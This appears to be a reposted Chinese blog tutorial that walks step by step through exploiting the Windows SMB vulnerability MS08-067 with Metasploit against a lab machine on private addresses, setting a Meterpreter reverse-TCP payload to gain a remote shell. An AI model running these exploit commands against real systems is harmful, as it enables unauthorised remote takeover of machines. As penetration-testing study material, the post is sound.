zoukankan      html  css  js  c++  java
  • kali-matasploit

    
    
    1、进入msf终端后,使用search功能搜索ms08-067,发现有一个可用模块:
    
    >msf > search ms08-067
    
    2、使用use命令选定要利用的模块:
    msf > use exploit/windows/smb/ms08_067_netapi
    
    3、设置攻击载荷为基于Windows系统的Meterpreter reverse_tcp 
    
     set PAYLOAD windows/meterpreter/reverse_tcp
    
    4、使用“show targets”命令让我们识别和匹配目标操作系统的类型。
    
    msf exploit(ms08_067_netapi) > show targets 
    
    E
    5、选定系统编号(TARTGET),设置靶机IP(RHOST)与本机IP(LHOST)
    
    msf exploit(ms08_067_netapi) > set TARGET 17
    TARGET => 17
    msf exploit(ms08_067_netapi) > set RHOST 192.168.116.129
    RHOST => 192.168.116.129
    msf exploit(ms08_067_netapi) > set LHOST 192.168.116.128
    LHOST => 192.168.116.128

    6、使用“show options”命令查看当前参数设置情况:
    msf exploit(ms08_067_netapi) >  show option
    
    
     7、参数检查无误后,输入“exploit”对靶机进行攻击。当返回meterpreter提示符表示利用成功。
    msf exploit(ms08_067_netapi) > run
  • 相关阅读:
    作业之 抽屉的实现
    Python数字
    Python字符串
    Python变量
    Python生成0到9的随机数
    Python 中is和==的区别?
    整理控|四象限系列电脑桌面壁纸分享一波
    Jmeter系列之接口自动化实战
    Jmeter系列之数据库操作
    Jmeter系列之接口断言
  • 原文地址:https://www.cnblogs.com/enddark/p/12973933.html
Copyright © 2011-2022 走看看